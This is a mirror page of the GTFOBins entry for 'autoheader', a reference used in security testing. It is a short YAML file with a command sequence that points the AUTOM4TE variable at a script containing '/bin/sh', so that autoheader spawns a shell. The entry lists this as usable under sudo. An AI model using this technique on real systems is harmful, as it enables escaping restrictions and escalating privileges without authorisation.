1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 06:31:33 +01:00
GTFOBins.github.io/_gtfobins/autoheader
2026-02-12 19:04:26 +01:00

13 lines
237 B
Plaintext

---
functions:
shell:
- code: |-
echo '/bin/sh 1>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
touch configure.ac
AUTOM4TE=/path/to/temp-file autoheader
contexts:
sudo:
unprivileged:
...